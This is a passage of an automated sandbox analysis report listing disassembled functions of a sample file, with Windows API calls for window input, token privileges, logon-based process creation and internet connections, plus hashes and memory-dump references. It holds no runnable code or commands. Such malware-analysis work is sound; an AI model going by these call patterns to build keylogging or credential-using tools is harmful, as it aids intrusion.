                                        • Opcode ID: 0139b62e8429261c5a6c56fa3edbedaac796c928465bab6701fe729ad322e0bd
                                        • Instruction ID: 9fea583122a09e8e3c7e93367b09e75f540668cc9c479ca5b1c54398a93c93e3
                                        • Opcode Fuzzy Hash: 0139b62e8429261c5a6c56fa3edbedaac796c928465bab6701fe729ad322e0bd
                                        • Instruction Fuzzy Hash: 1231EF3160064AAFDB218F74C844BFB7BE9FF41314F155429F864AB1A0EB39E850DB90
                                        Function 00F05175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 00F05189
                                          • Part of subcall function 00EE387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EE3897
                                          • Part of subcall function 00EE387D: GetCurrentThreadId.KERNEL32 ref: 00EE389E
                                          • Part of subcall function 00EE387D: AttachThreadInput.USER32(00000000,?,00EE52A7), ref: 00EE38A5
                                        • GetCaretPos.USER32(?), ref: 00F0519A
                                        • ClientToScreen.USER32(00000000,?), ref: 00F051D5
                                        • GetForegroundWindow.USER32 ref: 00F051DB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                        • String ID:
                                        • API String ID: 2759813231-0
                                        • Opcode ID: e6f701039f66a247067f1db79763a8588958dd892786a47c5bc04d2c13012801
                                        • Instruction ID: 6ef0e90ab8e974fa7699ce05f0d075b5b812b3be9535c08b408c084750dbb2d6
                                        • Opcode Fuzzy Hash: e6f701039f66a247067f1db79763a8588958dd892786a47c5bc04d2c13012801
                                        • Instruction Fuzzy Hash: B6310E71D00108AFDB14EFA5C9859EFB7F9EF98304F14506AE41AF7242EA759E05CBA0
                                        Function 00EA0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                        Download Yara Rule
                                        APIs
                                        • __setmode.LIBCMT ref: 00EA0BF2
                                          • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EE7B20,?,?,00000000), ref: 00E85B8C
                                          • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EE7B20,?,?,00000000,?,?), ref: 00E85BB0
                                        • _fprintf.LIBCMT ref: 00EA0C29
                                        • OutputDebugStringW.KERNEL32(?), ref: 00ED6331
                                          • Part of subcall function 00EA4CDA: _flsall.LIBCMT ref: 00EA4CF3
                                        • __setmode.LIBCMT ref: 00EA0C5E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                        • String ID:
                                        • API String ID: 521402451-0
                                        • Opcode ID: 553d00a8b0702b1d5a286bf84c5b756dd7e927a3b46308bf1e6280fd99595ea6
                                        • Instruction ID: 027ec55713a215bf06d8e0529e0dcb1984ecca31985ed2e71bb2461876116aaf
                                        • Opcode Fuzzy Hash: 553d00a8b0702b1d5a286bf84c5b756dd7e927a3b46308bf1e6280fd99595ea6
                                        • Instruction Fuzzy Hash: 911127729042087FCB04B7B49C439BEBBE89FCA320F14215AF20C7B1C2DEA16D469791
                                        Function 00ED8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00ED8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00ED8669
                                          • Part of subcall function 00ED8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00ED8673
                                          • Part of subcall function 00ED8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ED8682
                                          • Part of subcall function 00ED8652: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00ED8689
                                          • Part of subcall function 00ED8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ED869F
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00ED8BEB
                                        • _memcmp.LIBCMT ref: 00ED8C0E
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00ED8C44
                                        • HeapFree.KERNEL32(00000000), ref: 00ED8C4B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                        • String ID:
                                        • API String ID: 2182266621-0
                                        • Opcode ID: b471b8b97d32d53bc1c772e17603f7f7d4e797ed5ad3c2e1c48ef68ac1641998
                                        • Instruction ID: fa9730d303b23209efdf6aad57a81b930db039ede498186dfbecb64c8cb3d82d
                                        • Opcode Fuzzy Hash: b471b8b97d32d53bc1c772e17603f7f7d4e797ed5ad3c2e1c48ef68ac1641998
                                        • Instruction Fuzzy Hash: 9C218971E11208EBDB10CFA4CA48BEEB7B8EF54354F04409AE454AB240EB31AA06DB61
                                        Function 00EF1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EF1A97
                                          • Part of subcall function 00EF1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EF1B40
                                          • Part of subcall function 00EF1B21: InternetCloseHandle.WININET(00000000), ref: 00EF1BDD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Internet$CloseConnectHandleOpen
                                        • String ID:
                                        • API String ID: 1463438336-0
                                        • Opcode ID: 81a6ec6cd7e82728ed8b66877abca4045116ccc916e92e583365ef1b5d08de32
                                        • Instruction ID: 5fd95e0f9e123b57695847eeb8815fc78332a569e461ba3e3b7f284a36873b6f
                                        • Opcode Fuzzy Hash: 81a6ec6cd7e82728ed8b66877abca4045116ccc916e92e583365ef1b5d08de32
                                        • Instruction Fuzzy Hash: 69219F35200A0DFFDB229F608C01FBAB7A9FF84701F10105EFB11A6651EB719815ABA1
                                        Function 00EDE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EDF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00EDE1C4,?,?,?,00EDEFB7,00000000,000000EF,00000119,?,?), ref: 00EDF5BC
                                          • Part of subcall function 00EDF5AD: lstrcpyW.KERNEL32(00000000,?,?,00EDE1C4,?,?,?,00EDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00EDF5E2
                                          • Part of subcall function 00EDF5AD: lstrcmpiW.KERNEL32(00000000,?,00EDE1C4,?,?,?,00EDEFB7,00000000,000000EF,00000119,?,?), ref: 00EDF613
                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00EDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00EDE1DD
                                        • lstrcpyW.KERNEL32(00000000,?,?,00EDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00EDE203
                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00EDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00EDE237
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpylstrlen
                                        • String ID: cdecl
                                        • API String ID: 4031866154-3896280584
                                        • Opcode ID: 42b3ea181efe5b7baf0766340fe0a0a875cf71a0645e235911ad0eb64329b713
                                        • Instruction ID: 0a9784b71f555509e9d5bf7d1e1053fc0e4a3db01f02fae9fd7259c867531553
                                        • Opcode Fuzzy Hash: 42b3ea181efe5b7baf0766340fe0a0a875cf71a0645e235911ad0eb64329b713
                                        • Instruction Fuzzy Hash: A3118136200345EFCB25AF64DC4997A77B8FF49354B40502BF816DB360EB71A85297A0
                                        Function 00EB5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00EB5351
                                          • Part of subcall function 00EA594C: __FF_MSGBANNER.LIBCMT ref: 00EA5963
                                          • Part of subcall function 00EA594C: __NMSG_WRITE.LIBCMT ref: 00EA596A
                                          • Part of subcall function 00EA594C: RtlAllocateHeap.NTDLL(01150000,00000000,00000001), ref: 00EA598F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        • Opcode ID: a900ec1250b1258bf4754ca65f72d828a4674a6bff759937ad9fb6d44bd09585
                                        • Instruction ID: 4e60240ed5239a1931f22d4cfcc3926e54f2fb67b2be65d121e45a594b57503a
                                        • Opcode Fuzzy Hash: a900ec1250b1258bf4754ca65f72d828a4674a6bff759937ad9fb6d44bd09585
                                        • Instruction Fuzzy Hash: 1111A733904A15AFCB312F74AC457DF37D86F1A3B4B20242AFA45BE291DFB5A9409790
                                        Function 00E84531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00E84560
                                          • Part of subcall function 00E8410D: _memset.LIBCMT ref: 00E8418D
                                          • Part of subcall function 00E8410D: _wcscpy.LIBCMT ref: 00E841E1
                                          • Part of subcall function 00E8410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E841F1
                                        • KillTimer.USER32(?,00000001,?,?), ref: 00E845B5
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E845C4
                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EBD6CE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                        • String ID:
                                        • API String ID: 1378193009-0
                                        • Opcode ID: cc52dd7cd0599d42539537559fba9ad8d6d918fdf285b97258a3db872fef6579
                                        • Instruction ID: f803c777e958a5c75cd72d8bf9b2111a819b8bc15d8fc13c0b3b7aa029d8ef0b
                                        • Opcode Fuzzy Hash: cc52dd7cd0599d42539537559fba9ad8d6d918fdf285b97258a3db872fef6579
                                        • Instruction Fuzzy Hash: 4A21DDB0908744AFEB339B24DC45BEBBBECDF11308F04109EE69DA6185D7745A849B51
                                        Function 00ED8AF9 Relevance: 6.1, APIs: 4, Instructions: 65processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00ED8B2A
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00ED8B31
                                        • CloseHandle.KERNEL32(00000004), ref: 00ED8B4B
                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ED8B7A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                        • String ID:
                                        • API String ID: 2621361867-0
                                        • Opcode ID: 9c9d09292e05cf6ca4de2af2df22a13eb8dc84a71035c6f6e2ef76015280f998
                                        • Instruction ID: ad4c9a9aadc5ae8a0494ad93ccf1dd4a6073ecf9d2b675c7823d85bb5c8fdb0d
                                        • Opcode Fuzzy Hash: 9c9d09292e05cf6ca4de2af2df22a13eb8dc84a71035c6f6e2ef76015280f998
                                        • Instruction Fuzzy Hash: 76116AB650020DABDF118FA4EE49FDE7BA9FF08708F045066FE04A2160C7729D65EB61
                                        Function 00EF667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EE7B20,?,?,00000000), ref: 00E85B8C
                                          • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EE7B20,?,?,00000000,?,?), ref: 00E85BB0
                                        • gethostbyname.WS2_32(?), ref: 00EF66AC
                                        • WSAGetLastError.WS2_32(00000000), ref: 00EF66B7
                                        • _memmove.LIBCMT ref: 00EF66E4
                                        • inet_ntoa.WS2_32(?), ref: 00EF66EF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                        • String ID:
                                        • API String ID: 1504782959-0
                                        • Opcode ID: 8b43e3433f2cbf5bd01cbd2008c9efc754fa32122b047d5312727a1fabc4aefe
                                        • Instruction ID: d5f22b2553ea1d581e38e90b7d29c482d95ebbe00a8ab1159d9697cc10ec211d
                                        • Opcode Fuzzy Hash: 8b43e3433f2cbf5bd01cbd2008c9efc754fa32122b047d5312727a1fabc4aefe
                                        • Instruction Fuzzy Hash: C6110A36900509ABCB04FBA4DD86DEEB7F8BF58310B145065F50AB71A2DF30AE04DB61
                                        Function 00ED9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00ED9043
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ED9055
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ED906B
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ED9086
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: f19b1983133d010d2832afb85f90c85e30ffd726bd577b53654478aa2ebd65ba
                                        • Instruction ID: c142b6c7c5ea844939fce7221466bb97d98c21ce2fbb86ef7063f1c164533823
                                        • Opcode Fuzzy Hash: f19b1983133d010d2832afb85f90c85e30ffd726bd577b53654478aa2ebd65ba
                                        • Instruction Fuzzy Hash: 5E115E79900218FFDB10DFA5CC84E9DBBB4FB48310F204096E904B7290D6726E11DB90
                                        Function 00EE1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EE01FD,?,00EE1250,?,00008000), ref: 00EE166F
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00EE01FD,?,00EE1250,?,00008000), ref: 00EE1694
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EE01FD,?,00EE1250,?,00008000), ref: 00EE169E
                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00EE01FD,?,00EE1250,?,00008000), ref: 00EE16D1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CounterPerformanceQuerySleep
                                        • String ID:
                                        • API String ID: 2875609808-0
                                        • Opcode ID: 61447c74a22b3e563941ea49928c5a8daef254f57e13b10f8376545193d712e0
                                        • Instruction ID: 975ac6c50239a7cb2f2da9e8baefeaca263e9220018766cb9c759ee5ed75523f
                                        • Opcode Fuzzy Hash: 61447c74a22b3e563941ea49928c5a8daef254f57e13b10f8376545193d712e0
                                        • Instruction Fuzzy Hash: B9116131C0055ED7CF10AFA6D948AEEBF78FF09751F455099E941B6240CB3055A0DBD6
                                        Function 00EB7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                        • Instruction ID: c8ddb803551c503431d02664974b3fbdf66d69d9261d14d2f44d9447e9bc8ed9
                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                        • Instruction Fuzzy Hash: A901807205414ABBCF125E84CC018EE3F62BF99345F099515FE9868831D237C9B1AB81
                                        Function 00F0B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00F0B59E
                                        • ScreenToClient.USER32(?,?), ref: 00F0B5B6
                                        • ScreenToClient.USER32(?,?), ref: 00F0B5DA
                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F0B5F5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClientRectScreen$InvalidateWindow
                                        • String ID:
                                        • API String ID: 357397906-0
                                        • Opcode ID: d7cf58035992bbe17566143cffe994fdb8bbac003b5f71fc8686deafc0246b98
